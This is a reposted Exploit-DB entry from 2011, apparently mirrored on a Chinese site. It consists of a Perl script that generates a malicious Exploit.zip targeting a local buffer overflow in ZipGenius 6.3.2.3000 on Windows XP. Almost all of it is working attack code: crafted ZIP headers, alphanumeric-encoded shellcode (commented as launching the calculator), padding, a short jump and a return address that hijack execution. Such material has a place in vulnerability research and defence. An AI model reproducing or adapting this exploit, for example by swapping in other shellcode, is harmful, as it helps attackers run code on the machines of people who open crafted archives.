ZipGenius 6.3.2.3000 – ‘.zip’ Local Buffer Overflow - 体验盒子

作者： C4SS!0 G0M3S

日期： 2011-07-08

类别：

local

平台：

windows

来源：https://www.exploit-db.com/exploits/17511/

1

2

3

4

5

6

7

8

9

10

11

12

13

14

15

16

17

18

19

20

21

22

23

24

25

26

27

28

29

30

31

32

33

34

35

36

37

38

39

40

41

42

43

44

45

46

47

48

49

50

51

52

53

54

55

56

57

58

59

60

61

62

63

64

65

66

67

#!/usr/bin/perl

#

#[+]Exploit Title: ZipGenius v6.3.2.3000 .ZIP File Buffer Overflow Exploit

#[+]Date: 08\07\2011

#[+]Author: C4SS!0 G0M3S

#[+]Software Link: http://www.freewarefiles.com/ZipGenius-V_program_3344.html

#[+]Version: 6.3.2.3000

#[+]Tested On: WIN-XP SP3 Brazilian Portuguese

#[+]CVE: N/A

#

use strict;

use warnings;

my $filename = "Exploit.zip";

print "\n\n\t\tZipGenius v6.3.2.3000 .ZIP File Buffer Overflow Exploit\n";

print "\t\tCreated by C4SS!0 G0M3S\n";

print "\t\tE-mail Louredo_\@hotmail.com\n";

print "\t\tSite www.exploit-br.org/\n\n";

sleep(2);

my $head = "\x50\x4B\x03\x04\x14\x00\x00".

"\x00\x00\x00\xB7\xAC\xCE\x34\x00\x00\x00" .

"\x00\x00\x00\x00\x00\x00\x00\x00" .

"\xe4\x0f" .

"\x00\x00\x00";

my $head2 = "\x50\x4B\x01\x02\x14\x00\x14".

"\x00\x00\x00\x00\x00\xB7\xAC\xCE\x34\x00\x00\x00" .

"\x00\x00\x00\x00\x00\x00\x00\x00\x00".

"\xe4\x0f".

"\x00\x00\x00\x00\x00\x00\x01\x00".

"\x24\x00\x00\x00\x00\x00\x00\x00";

my $head3 = "\x50\x4B\x05\x06\x00\x00\x00".

"\x00\x01\x00\x01\x00".

"\x12\x10\x00\x00".

"\x02\x10\x00\x00".

"\x00\x00";

my $shellcode =

"PYIIIIIIIIIIQZVTX30VX4AP0A3HH0A00ABAABTAAQ2AB2BB0BBXP8ACJJIOJDKJTSICL9MYQ8YRTQ4L".

"41K6IXI81WBLCZKKL6QQC4NUSV8KJMKLIY2JJN5RRQJJKMUKKOO9JZ7Z884POWXJJLXSS8CON5XJW912".

"6WONPTLG14NQQOQPMYLMQOSFQUN9FUSTKXQFKQUPL4OIS4W5U1T3FLHQ2EHPKOYKTDWZSHQMQM7MPBKL".#SHELLCODE WinExec("CALC",0);

"KVW7HKWHCNOP2NOKCHNMGNSO8LYMLS0OJTXRUPYQSFKNYFVBZK47DQVNZFBNGWMNPPQPZQV337XMPXCL".

"VLJ0C3C3CVKMWKRL0GWBLSP1NVKBSOUN4V7L8G8WKYNOJ2NMOOKTYTNLFE1XOFOHXHMNPZ5LRKOOUNLK".

"HLUVXGLMWHP7KWNMXSB644O4CEMVCLPO6QJ9KYJPKXJD4LCTYPOTYVTJTLSQ4OGKMRK8SI7D7BNMO2OB".

"K4BX0S5LKNQX14OM8646B9CZOA";

my $payload = $shellcode;

$payload .= "A" x (1060-length($shellcode));

$payload .= "\xeb\x0b\x90\x90";

$payload .= pack('V',0x0283119C);

$payload .= "\x45" x 10;

$payload .= ("\x61" x 13)."\x58\x50\xc3"; #POP EAX / PUSH EAX / RETN

$payload .= "\x41" x (4064-length($payload));

$payload = $payload.".txt";

my $zip = $head.$payload.$head2.$payload.$head3;

open(FILE,">$filename") || die "[-]Error:\n$!\n";

print FILE $zip;

close(FILE);

print "[+] ZIP File Created With Sucess:)\n";

sleep(1);